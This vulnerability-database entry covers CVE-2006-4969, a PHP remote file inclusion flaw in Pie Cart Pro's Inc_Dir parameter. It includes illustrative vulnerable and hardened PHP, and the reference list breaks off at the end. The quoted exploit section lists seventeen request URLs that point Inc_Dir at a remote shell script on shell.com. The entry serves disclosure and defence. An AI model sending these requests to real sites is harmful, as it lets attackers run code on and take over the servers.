WAHM E-Commerce Pie Cart Pro Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1111081    Vulnerability type: Input validation
Published: 2006-09-19    Updated: 2006-09-27
CVE ID: CVE-2006-4969    CNNVD ID: CNNVD-200609-414
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/2393
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-414
|Vulnerability details
WAHM E-Commerce Pie Cart Pro contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code by supplying a URL in the Inc_Dir parameter of any of the following files: (1) affiliates.php, (2) orders.php, (3) events.php, (4) index.php, (5) articles.php, (6) faqs.php, (7) guestbook.php, (8) catalog.php, (9) wholesale.php, (10) weblinks.php, (11) certificates.php, (12) sitesearch.php, (13) contact.php, (14) sitemap.php, (15) search.php, (16) registry.php or (17) error.php.
|Exploit
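As an added illustration (not code from Pie Cart Pro or from this advisory), the include pattern the description implies, reconstructed as an assumption, next to a hardened form that never lets request data reach include(); the INC_DIR constant, the ALLOWED_MODULES list and the function names are assumed.

```php
<?php
// Added example, not Pie Cart Pro's code. The vulnerable shape is an assumption
// reconstructed from the advisory: a request-controlled Inc_Dir prefix passed
// to include().

// VULNERABLE (assumed): with register_globals, or an explicit $_GET read as here,
// $Inc_Dir comes from the query string. With allow_url_fopen/allow_url_include
// enabled, include() fetches the remote URL and runs whatever PHP it returns.
function load_module_vulnerable(string $module): void
{
    $Inc_Dir = $_GET['Inc_Dir'] ?? './inc';
    include $Inc_Dir . '/' . $module . '.php';
}

// HARDENED: the include root is a constant fixed at install time, the module
// name is checked against an allowlist, and the resolved path is verified to
// stay below that root. Nothing from the request reaches include().
const INC_DIR = __DIR__ . '/inc';                                   // assumed
const ALLOWED_MODULES = ['affiliates', 'orders', 'events', 'catalog']; // assumed

function resolve_module(string $module): ?string
{
    if (!in_array($module, ALLOWED_MODULES, true)) {
        return null;                      // unknown module name: refuse
    }
    $root = realpath(INC_DIR);
    $path = realpath(INC_DIR . '/' . $module . '.php');
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;                      // missing, or escaped the include root
    }
    return $path;
}

function load_module_hardened(string $module): void
{
    $path = resolve_module($module);
    if ($path === null) {
        http_response_code(404);
        exit('unknown module');
    }
    include $path;
}

// Defence in depth: also disable remote includes in php.ini
// (allow_url_include=Off, and allow_url_fopen=Off where nothing needs it),
// so a regression in the code above still cannot pull code over HTTP.
```

Monitoring for Inc_Dir values that begin with a URL scheme in the web server access log gives a cheap detection for attempts against unpatched installs.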
#====================================================================
# Pie Cart Pro => (Inc_Dir) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By SnIpEr_SA
#
#http://www.doodlebabies.com/
#
#=================================================================
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/affiliates.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/orders.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/events.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/index.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/articles.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/faqs.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/guestbook.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/catalog.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/wholesale.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/weblinks.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/certificates.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/sitesearch.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/contact.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/sitemap.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/search.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/registry.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/error.php?Inc_Dir=http://shell.com/shell.txt?
#
#==============================================================================
#Discovered By : SnIpEr_SA
#
#Contact : SnIpEr.SA[at]hotmail.com
#
#GreetZ : SaUdi HaCkRz , Devil-x , shereba, BlacK-Code, KILLERxXx ,Qptan,red devil , mazagi,Mohajer And All My Friends
#http://www.elite-team.cc/vb , www.3asfh.net ,www.lezr.com
============================================================================#

# milw0rm.com [2006-09-19]
|References

XF piecartpro-incdir-file-include(29023): http://xforce.iss.net/xforce/xfdb/29023
BID 20099: http://www.securityfocus.com/bid/20099
MILW0RM 2393: http://www.milw0rm.com/exploits/2393
OSVDB 29214: http://www.osvdb.org/29214
OSVDB 29213: http://www.osvdb.org/29213
OSVDB 29212: http://www.osvdb.org/29212
OSVDB 29211: http://www.osvdb.org/29211
OSVDB 29210: http://www.osvdb.org/29210
OSVDB 29209: http://www.osvdb.org/29209
OSVDB 29208: http://www.osvdb.org/29208
OSVDB 29207: http://www.osvdb.org/29207
OSVDB 29206: http://www.osvdb.org/29206
OSVDB 29205: http://www.osvdb.org/29205
OSVDB 29204: http://www.osvdb.org/29204
OSVDB 29203: http://www.osvdb.org/29203
OSVDB 29202: http://www.osvdb.org/29202
OSVDB 29201: http://www.osvdb.org/29201
OSVDB 29200: http://www.osvdb.org/29200
OSVDB 29199: http://www.osvdb.org/29199
OSVDB 29198: htt